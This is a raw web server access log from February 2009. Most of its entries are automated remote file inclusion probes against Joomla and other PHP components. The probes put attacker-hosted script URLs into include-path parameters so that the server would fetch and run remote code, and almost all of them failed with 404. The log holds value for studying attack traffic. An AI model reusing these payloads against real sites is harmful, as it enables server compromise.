216.22.26.95 - - [05/Feb/2009:02:05:02 -0600] "GET /logs/access_log.1212278400/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:05:08 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:05:08 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:05:35 -0600] "GET /logs/access_log.1212624000/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:05:35 -0600] "GET /logs/access_log.1212796800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.67.19.103 - - [05/Feb/2009:02:06:08 -0600] "GET /logs/access_log.1210809600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 371 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.67.19.103 - - [05/Feb/2009:02:06:08 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 344 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.22.26.95 - - [05/Feb/2009:02:06:23 -0600] "GET /logs/access_log.1214524800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.22.26.95 - - [05/Feb/2009:02:06:34 -0600] "GET /logs/access_log.1214524800/joomla/index.php?option=com_restaurante&task=http://h1.ripway.com/matamune/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.67.19.103 - - [05/Feb/2009:02:07:09 -0600] "GET /logs/access_log.1212192000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 371 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.67.19.103 - - [05/Feb/2009:02:07:19 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
195.5.163.212 - - [05/Feb/2009:02:13:30 -0600] "GET /logs/access_log.1216252800//poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:02:13:30 -0600] "GET //poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:02:13:30 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:15:09 -0600] "GET /logs/access_log.1216512000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:15:09 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:15:09 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.232.66.107 - - [05/Feb/2009:02:15:34 -0600] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.232.66.107 - - [05/Feb/2009:02:15:34 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.232.66.107 - - [05/Feb/2009:02:15:34 -0600] "GET //index.php?DOCUMENT_ROOT=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
80.67.19.103 - - [05/Feb/2009:02:15:51 -0600] "GET /logs/access_log.1210550400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:02:15:52 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
80.67.19.103 - - [05/Feb/2009:02:15:52 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.808"
91.195.124.11 - - [05/Feb/2009:02:16:17 -0600] "GET /!scanhttp://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:16:17 -0600] "GET /!scanhttp://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:16:17 -0600] "GET /logs/!scanhttp://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:16:18 -0600] "GET /logs/!scanhttp://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
65.55.208.137 - - [05/Feb/2009:02:16:39 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [05/Feb/2009:02:16:39 -0600] "GET /logs/access_log.1157155200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [05/Feb/2009:02:16:40 -0600] "GET /logs/access_log.1205280000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.137 - - [05/Feb/2009:02:16:40 -0600] "GET /logs/access_log.1167609600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
91.195.124.11 - - [05/Feb/2009:02:16:55 -0600] "GET /logs/access_log.1216512000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:16:55 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:16:55 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:17:06 -0600] "GET /logs/access_log.1216512000//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:17:06 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:17:06 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
195.5.163.212 - - [05/Feb/2009:02:18:21 -0600] "GET /logs/access_log.1219276800//poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
88.191.95.106 - - [05/Feb/2009:02:18:27 -0600] "GET /logs/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:02:18:27 -0600] "GET /index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:02:18:27 -0600] "GET /logs/access_log.1214092800/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.5.163.212 - - [05/Feb/2009:02:18:32 -0600] "GET /logs/access_log.1218412800//poll/poll_ssi.php?include_path=http://jeticu.com/ktmlpro/includes/ktedit/web.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:19:12 -0600] "GET /logs/access_log.1213660800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:19:17 -0600] "GET /logs/access_log.1213660800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:19:19 -0600] "GET /logs/access_log.1216512000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:19:19 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:19:20 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:02:19:26 -0600] "GET /logs/access_log.1214179200/components/com_forum/download.php?phpbb_root_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:02:19:26 -0600] "GET /components/com_forum/download.php?phpbb_root_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:02:19:29 -0600] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
80.67.19.103 - - [05/Feb/2009:02:19:34 -0600] "GET /logs/access_log.1210291200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usharewarez.org.uk//log/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.808"
193.140.245.7 - - [05/Feb/2009:02:20:42 -0600] "GET /logs/access_log.1210291200//init_basic.php?GALLERY_BASEDIR=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
193.140.245.7 - - [05/Feb/2009:02:20:42 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.140.245.7 - - [05/Feb/2009:02:20:42 -0600] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
193.140.245.7 - - [05/Feb/2009:02:20:47 -0600] "GET //init_basic.php?GALLERY_BASEDIR=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.186.61.66 - - [05/Feb/2009:02:20:49 -0600] "GET /?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
213.186.61.66 - - [05/Feb/2009:02:20:50 -0600] "GET /logs/?DOCUMENT_ROOT=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 200 36689 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:02:21:29 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:02:21:29 -0600] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:02:21:29 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
89.108.82.20 - - [05/Feb/2009:02:21:30 -0600] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.schlachtbank.net/images/bg.swf?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
121.189.15.10 - - [05/Feb/2009:02:22:13 -0600] "GET /logs/access_log.1212364800%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:02:22:13 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:02:22:13 -0600] "GET /logs/access_log.1212364800%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:02:22:13 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
77.232.66.107 - - [05/Feb/2009:02:22:15 -0600] "GET /logs/access_log.1216598400//index.php?DOCUMENT_ROOT=http://kangarooislandnature.com/fuzzylime/code/polls/users/idfx.txt????%0D? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
66.235.124.24 - - [05/Feb/2009:02:22:34 -0600] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
121.189.15.10 - - [05/Feb/2009:02:22:43 -0600] "GET /logs/access_log.1216080000%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
121.189.15.10 - - [05/Feb/2009:02:22:43 -0600] "GET /logs/access_log.1216080000%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.viparenda.ru/includes/images/copyright.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
84.21.71.133 - - [05/Feb/2009:02:22:51 -0600] "GET /logs/access_log.1213660800//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
87.101.4.49 - - [05/Feb/2009:02:22:57 -0600] "GET /logs/access_log.1211932800//?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:02:22:57 -0600] "GET //?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:02:22:57 -0600] "GET /logs/access_log.1208131200//?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
87.101.4.49 - - [05/Feb/2009:02:22:58 -0600] "GET /logs//?base_folder=http://jense.biz/info.txt???? HTTP/1.1" 200 117465 "-""libwww-perl/5.79"
193.140.245.7 - - [05/Feb/2009:02:23:19 -0600] "GET /logs/access_log.1209686400//init_basic.php?GALLERY_BASEDIR=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
200.123.132.173 - - [05/Feb/2009:02:24:02 -0600] "GET /logs/access_log.1216944000/components/com_forum/download.php?phpbb_root_path=http://www.kmt-s.ru/chid.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
91.193.20.48 - - [05/Feb/2009:02:24:17 -0600] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
67.205.106.198 - - [05/Feb/2009:02:27:40 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wnr.se/cs/id? HTTP/1.1" 404 319 "-""libwww-perl/5.820"
204.11.17.16 - - [05/Feb/2009:02:28:37 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
91.193.20.48 - - [05/Feb/2009:02:30:49 -0600] "GET /logs/access_log.1218758400//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
91.193.20.48 - - [05/Feb/2009:02:30:49 -0600] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
91.193.20.48 - - [05/Feb/2009:02:30:50 -0600] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
71.113.37.251 - - [05/Feb/2009:02:31:57 -0600] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
71.113.37.251 - - [05/Feb/2009:02:32:07 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
91.195.124.11 - - [05/Feb/2009:02:34:17 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:17 -0600] "GET /logs/access_log.1212364800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:17 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:25 -0600] "GET /logs/access_log.1212364800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:25 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:25 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:29 -0600] "GET /logs/access_log.1216080000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
91.193.20.48 - - [05/Feb/2009:02:34:31 -0600] "GET /logs/access_log.1219536000//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
91.195.124.11 - - [05/Feb/2009:02:34:38 -0600] "GET /logs/access_log.1216080000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://cccgj.org/media/htaccess.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
119.63.201.142 - - [05/Feb/2009:02:34:54 -0600] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
72.82.228.83 - - [05/Feb/2009:02:35:26 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
72.82.228.83 - - [05/Feb/2009:02:35:26 -0600] "GET /logs/access_log.1212364800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
72.82.228.83 - - [05/Feb/2009:02:35:26 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
72.82.228.83 - - [05/Feb/2009:02:35:44 -0600] "GET /logs/access_log.1216080000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.kosher.jewishideas.com/modules/respon.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:35:58 -0600] "GET /logs/access_log.1212364800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:35:58 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:35:58 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:36:16 -0600] "GET /logs/access_log.1216080000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:36:24 -0600] "GET /logs/access_log.1212364800//?path%5Bdocroot%5D=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:36:24 -0600] "GET //?path%5Bdocroot%5D=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:36:28 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:36:30 -0600] "GET /logs//?path%5Bdocroot%5D=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 200 117465 "-""libwww-perl/5.805"
84.21.71.133 - - [05/Feb/2009:02:37:20 -0600] "GET /logs/access_log.1219017600//?path%5Bdocroot%5D=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
204.11.17.16 - - [05/Feb/2009:02:40:19 -0600] "GET /logs/access_log.1211155200//view.inc.php?phpAds_path=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:02:40:19 -0600] "GET //view.inc.php?phpAds_path=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
204.11.17.16 - - [05/Feb/2009:02:40:19 -0600] "GET /logs//view.inc.php?phpAds_path=http://www.cuorerossoblu.com/news/id? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
85.186.255.184 - - [05/Feb/2009:02:40:57 -0600] "GET /logs/access_log.1210118400/tiki-xmlrpc_services.php? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
85.186.255.184 - - [05/Feb/2009:02:40:57 -0600] "GET /tiki-xmlrpc_services.php? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
85.186.255.184 - - [05/Feb/2009:02:40:58 -0600] "GET /logs/tiki-xmlrpc_services.php? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
119.63.201.142 - - [05/Feb/2009:02:42:56 -0600] "GET /logs/access_log.1206230400//oneadmin/photogallery/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
119.63.201.142 - - [05/Feb/2009:02:42:57 -0600] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
119.63.201.142 - - [05/Feb/2009:02:42:57 -0600] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
88.191.95.106 - - [05/Feb/2009:02:43:16 -0600] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:02:43:16 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.95.106 - - [05/Feb/2009:02:43:16 -0600] "GET /logs/access_log.1219536000%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
132.248.117.152 - - [05/Feb/2009:02:43:55 -0600] "GET /logs/access_log.1213228800/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:43:55 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:43:55 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:44:00 -0600] "GET /logs/access_log.1214352000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:44:00 -0600] "GET /cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:44:00 -0600] "GET /logs/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:44:03 -0600] "GET /logs/access_log.1216512000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
132.248.117.152 - - [05/Feb/2009:02:45:33 -0600] "GET /logs/access_log.1210896000/cache/errors.php?error=http://www.apoe.at/cache/chi.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
